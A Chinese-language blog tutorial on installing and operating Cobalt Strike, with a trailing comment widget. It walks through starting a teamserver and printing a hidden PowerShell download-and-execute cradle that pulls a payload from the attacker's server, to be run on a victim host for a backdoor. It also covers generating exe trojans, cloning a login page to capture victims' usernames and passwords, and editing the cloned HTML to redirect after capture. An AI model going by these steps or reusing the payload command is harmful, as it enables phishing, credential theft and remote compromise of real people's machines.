cobalt strike安装及使用方法

cobalt strike安装及使用方法

1.概述:

Cobalt Strike是一款的渗透测试工具:

  1. 拥有多种协议主机上线方式,集成了提权,凭据导出,端口转发,socket代理,office攻击,文件捆绑,钓鱼等多种功能
  2. Cobalt Strike还可以调用Mimikatz等其他知名工具
  3. Cobalt Strike集成了端口转发、服务扫描,自动化溢出,多模式端口监听,win exe木马生成,win dll木马生成,java木马生成,office宏病毒生成,木马捆绑;钓鱼攻击包括:站点克隆,目标信息获取,java执行,浏览器自动攻击
  4. Cobalt Strike采用C/S架构的商业渗透软件,适合多人进行团队协作,可模拟APT做模拟对抗,进行内网渗透

2.安装

1.下载

官网:Access denied | cobaltstrike.com used Cloudflare to restrict access(中国的ip访问不了)

网盘:链接:https://pan.baidu.com/s/1UORpxIEvmu0je5a9JDtYNg (提取码:gira)

2.放入kali中解压缩

fig:

3.提权限

在自己的cs的文件夹界面打开终端

或者

cd 地址

提权命令:

chmod +x teamserver

4.运行服务端(我这里用的我自己的kali的公网ip)

使用指令查询公网ip地址

ifconfig

fig:

./teamserver 192.168.159.130 123456 格式(./teamserver 公网ip 密码)

fig:

注意:

这里的密码是一次性的每一次重新开启都重新设置

报错处理:

这里提示我权限不够

fig:

所以加上sudo(提高至管理员权限)

5.客户端运行

fig:

win会提示安全保护将他忽略执行即可

fig:

ip同上

端口默认50050不用改

用户名可以随意

密码同上

6.成功打开

fig:

powershell.exe -nop -w hidden -c “IEX ((new-object net.webclient).downloadstring(‘http://192.168.159.130:80/a’))”

powershell.exe -nop -w hidden -c “IEX ((new-object net.webclient).downloadstring(‘http://192.168.159.130:80/a’))”

3.使用

1.在监听区添加监听器

fig:

2.选择添加

![image-20240303175911389](C:\Users\26612\AppData\Roaming\Typora\typora-user-images\image-20240303175911389.png

fig:

3.web钓鱼

1.生成http的payload

fig:

2.设置监听

fig:

3.复制

在点击运行后会弹出一个窗口,这里需要将Cobalt Strike生成的Payload需要完整地复制下来,其中url它是个文件路径,就是让目标 (受害者)通过这个地址和端口下载 恶意脚本

命令:powershell.exe -nop -w hidden -c “IEX ((new-object net.webclient).downloadstring(‘http://192.168.10.20:80/a’))”

4.访问URL

URL:http://192.168.10.20/a

fig:

5.执行paylod

在目标主机上执行payload

这里我的理解是使用命令让其读取URL中代码进行后门植入。
执行的命令就是刚刚弹出提示的命令

4.exe文件马子

1.打开文件马子设置窗口

fig:

2.设置监听器

fig:

3.运行exe文件

fig:

4.发现主机上线

fig:

5.网站克隆

1.示例伪造目标

http://wvw.9377.com/login.php

fig:

2.网站克隆

fig:

3.克隆网站配置

fig:

4.在受害者端输入克隆网站对应的ip

fig:

5.测试

1.测试数据

在钓鱼网站上输入账号:admin,密码:123456

fig:

2.客户端查看日志

fig:

6.钓鱼网站(克隆网站)拓展

1.在服务器端kali Linux里面下载phpstudy

wget -O install.sh https://notdocker.xp.cn/install.sh && sudo bash install.sh

fig:

2.浏览器访问上图内网连接,如果使用的是服务器的话,那就访问外网连接,然后输入上图的账号密码,并且启动下图两个服务

fig:

3.尝试使用受害者电脑访问服务器端的IP,可以连接上

fig:

4.对上述生成的钓鱼网站在浏览器控制台查看源码

fig:
fig:

5.在钓鱼网页找到登录按钮位置

fig:

6.以下代码添加进去

onclick=”window.location.href=’http://wvw.9377.com/login.php'”

fig:

7.把该钓鱼HTML文件拖到受害者端尝试打开
1.打开,并输入账号abc123,密码:qwe789

fig:

2.返回攻击端查看web日志,能监听
8.把钓鱼网站放到服
fig:
务器上
9.在受害这端打开phpstudy路径

fig:

能打开,这时再次输入账号:llaa,密码:phpstudy

10.回到攻击者端查看cs的web日志,监听成功

fig:

可以随时监听钓鱼网站,而不用每次都得克隆网址了

暂无评论

发送评论 编辑评论


				
|´・ω・)ノ
ヾ(≧∇≦*)ゝ
(☆ω☆)
(╯‵□′)╯︵┴─┴
 ̄﹃ ̄
(/ω\)
∠( ᐛ 」∠)_
(๑•̀ㅁ•́ฅ)
→_→
୧(๑•̀⌄•́๑)૭
٩(ˊᗜˋ*)و
(ノ°ο°)ノ
(´இ皿இ`)
⌇●﹏●⌇
(ฅ´ω`ฅ)
(╯°A°)╯︵○○○
φ( ̄∇ ̄o)
ヾ(´・ ・`。)ノ"
( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃
(ó﹏ò。)
Σ(っ °Д °;)っ
( ,,´・ω・)ノ"(´っω・`。)
╮(╯▽╰)╭
o(*////▽////*)q
>﹏<
( ๑´•ω•) "(ㆆᴗㆆ)
😂
😀
😅
😊
🙂
🙃
😌
😍
😘
😜
😝
😏
😒
🙄
😳
😡
😔
😫
😱
😭
💩
👻
🙌
🖕
👍
👫
👬
👭
🌚
🌝
🙈
💊
😶
🙏
🍦
🍉
😣
Source: github.com/k4yt3x/flowerhd
颜文字
Emoji
小恐龙
花!
上一篇
下一篇